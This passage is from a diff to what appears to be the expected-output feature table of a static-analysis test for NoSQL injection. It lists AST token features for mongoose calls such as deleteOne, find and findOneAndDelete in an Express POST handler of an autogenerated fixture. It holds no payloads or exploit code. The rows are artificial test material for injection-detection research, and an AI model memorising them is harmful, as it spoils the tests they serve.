autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | exceptional return of Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | exceptional return of Documen ... e(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | exceptional return of Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:2:117:25 | exceptional return of Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:11:117:19 | deleteOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:11:117:19 | deleteOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:11:117:19 | deleteOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:11:117:19 | deleteOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | CalleeFlexibleAccessPath | Document.deleteOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | calleeImports | mongoose | @@ -2908,6 +14585,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:117:21:117:24 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:19 | Document.geoSearch | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:19 | Document.geoSearch | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:19 | Document.geoSearch | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:19 | Document.geoSearch | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | Documen ... h(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | Documen ... h(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | Documen ... h(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | Documen ... h(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | exceptional return of Documen ... h(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | exceptional return of Documen ... h(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | exceptional return of Documen ... h(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:2:118:25 | exceptional return of Documen ... h(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:11:118:19 | geoSearch | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:11:118:19 | geoSearch | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:11:118:19 | geoSearch | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:11:118:19 | geoSearch | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | CalleeFlexibleAccessPath | Document.geoSearch | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | calleeImports | mongoose | @@ -2916,6 +14613,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:118:21:118:24 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:16 | Document.remove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:16 | Document.remove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:16 | Document.remove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:16 | Document.remove | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | Documen ... e(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | exceptional return of Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | exceptional return of Documen ... e(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | exceptional return of Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:2:119:22 | exceptional return of Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:11:119:16 | remove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:11:119:16 | remove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:11:119:16 | remove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:11:119:16 | remove | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | CalleeFlexibleAccessPath | Document.remove | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | calleeImports | mongoose | @@ -2924,6 +14641,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:119:18:119:21 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:20 | Document.replaceOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:20 | Document.replaceOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:20 | Document.replaceOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:20 | Document.replaceOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | Documen ... ond, Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | exceptional return of Documen ... ond, Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | exceptional return of Documen ... ond, Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | exceptional return of Documen ... ond, Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:2:120:29 | exceptional return of Documen ... ond, Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:11:120:20 | replaceOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:11:120:20 | replaceOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:11:120:20 | replaceOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:11:120:20 | replaceOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:22:120:25 | cond | CalleeFlexibleAccessPath | Document.replaceOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:22:120:25 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:22:120:25 | cond | calleeImports | mongoose | @@ -2940,6 +14677,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:28:120:28 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:28:120:28 | Y | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:120:28:120:28 | Y | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | Document.find(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | Document.find(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | Document.find(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | Document.find(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | exceptional return of Document.find(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | exceptional return of Document.find(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | exceptional return of Document.find(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:2:121:20 | exceptional return of Document.find(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:11:121:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:11:121:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:11:121:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:11:121:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | calleeImports | mongoose | @@ -2948,6 +14705,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:121:16:121:19 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | Documen ... e(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | exceptional return of Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | exceptional return of Documen ... e(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | exceptional return of Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:2:122:23 | exceptional return of Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:11:122:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:11:122:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:11:122:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:11:122:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | calleeImports | mongoose | @@ -2956,6 +14733,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:122:19:122:22 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:18 | Document.findById | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:18 | Document.findById | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:18 | Document.findById | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:18 | Document.findById | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | Documen ... yId(id) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | Documen ... yId(id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | Documen ... yId(id) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | Documen ... yId(id) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | exceptional return of Documen ... yId(id) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | exceptional return of Documen ... yId(id) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | exceptional return of Documen ... yId(id) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:2:123:22 | exceptional return of Documen ... yId(id) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:11:123:18 | findById | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:11:123:18 | findById | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:11:123:18 | findById | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:11:123:18 | findById | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | CalleeFlexibleAccessPath | Document.findById | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | calleeImports | mongoose | @@ -2964,6 +14761,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:123:20:123:21 | id | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:26 | Documen ... dDelete | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:26 | Documen ... dDelete | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:26 | Documen ... dDelete | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:26 | Documen ... dDelete | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | Documen ... e(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | exceptional return of Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | exceptional return of Documen ... e(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | exceptional return of Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:2:124:32 | exceptional return of Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:11:124:26 | findOneAndDelete | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:11:124:26 | findOneAndDelete | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:11:124:26 | findOneAndDelete | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:11:124:26 | findOneAndDelete | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | CalleeFlexibleAccessPath | Document.findOneAndDelete | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | calleeImports | mongoose | @@ -2972,6 +14789,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:124:28:124:31 | cond | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:26 | Documen ... dRemove | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:26 | Documen ... dRemove | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:26 | Documen ... dRemove | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:26 | Documen ... dRemove | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | Documen ... e(cond) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | exceptional return of Documen ... e(cond) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | exceptional return of Documen ... e(cond) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | exceptional return of Documen ... e(cond) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:2:125:32 | exceptional return of Documen ... e(cond) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:125:11:125:26 | 